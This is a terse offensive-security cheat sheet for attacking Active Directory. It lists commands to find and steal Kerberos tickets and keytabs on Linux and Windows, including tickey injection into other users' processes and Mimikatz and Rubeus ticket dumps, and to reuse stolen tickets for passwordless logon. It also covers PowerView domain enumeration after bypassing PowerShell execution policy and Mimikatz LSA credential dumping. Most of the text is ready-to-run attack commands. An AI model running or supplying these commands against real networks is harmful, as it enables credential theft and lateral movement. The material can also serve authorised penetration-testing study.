# Active Directory

## Enumerate Juicy Info

### Harvest tickets from Linux

Check type and location of tickets:

```
grep default_ccache_name /etc/krb5.conf
```

If none return, default is FILE:/tmp/krb5cc\_%{uid}.

In case of file tickets, you can copy-paste (if you have permissions) for use them.

In case of being *KEYRING* tickets, you can use [tickey](https://github.com/TarlogicSecurity/tickey) to get them:

```
# To dump current user tickets, if root, try to dump them all by injecting in other user processes
# to inject, copy tickey in a reachable folder by all users
cp tickey /tmp/tickey
/tmp/tickey -i
```

### Harvest tickets from Windows

With [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```
mimikatz # sekurlsa::tickets /export
```

With [Rubeus](https://github.com/GhostPack/Rubeus) in Powershell:

```
.\Rubeus dump

# After dump with Rubeus tickets in base64, to write the in a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))
```

reference:

<https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a>

### krb5.keytab

extract with this -> <https://github.com/sosdave/KeyTabExtract/blob/master/keytabextract.py>

<pre><code><strong># Linux cache kerberost ticket
</strong><strong>
</strong><strong>find / -type f -iname "krb5.keytab" 2>/dev/null
</strong>find / -type f -iname "krb5cc_*" 2>/dev/null



# Windows cache kerberost ticket

dir "\krb5*.keytab" /s
dir "\krb5cc_*" /s
</code></pre>

if you found the `krb5cc_*` file, just export it to env variable KRB5CCNAME then check with klist

```
export KRB5CCNAME=/tmp/krb5cc*
klist

# if imported it mean you able to auto logon without password

python3 GetADUsers.py -all -k -no-pass -dc-ip 172.16.x.y <domain>/<username>

```

## PowerView

### Import module

<pre><code>powershell -ep bypass
<strong>[PS] . .\PowerView.ps1
</strong></code></pre>

### The Domain Users

```
Get-NetUser | select cn

# dump the interesting info
Get-NetUser | select cn,lastlogon,logoncount,memberof

```

### The Domain Groups

```
Get-NetGroup -GroupName *admin*
```

### The Shared Folder

```
Invoke-SharedFinder
```

Note:\
Default shared folder:

```
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
```

<figure><img src="https://1855963211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaDjlLLsWaat1v8p89kgM%2Fuploads%2FMWi7MK5cUnO6DGM218e9%2Fimage.png?alt=media&#x26;token=82c40ecc-e534-4098-8d3b-75f3780a8baf" alt=""><figcaption></figcaption></figure>

### Net Computer

```
Get-NetComputer -FullData
Get-NetComputer -FullData |select operatingsystem
```

## Mimikatz

note: must run as administrator

```
mimikats.exe

privilege::debug
lsadump::lsa /patch

```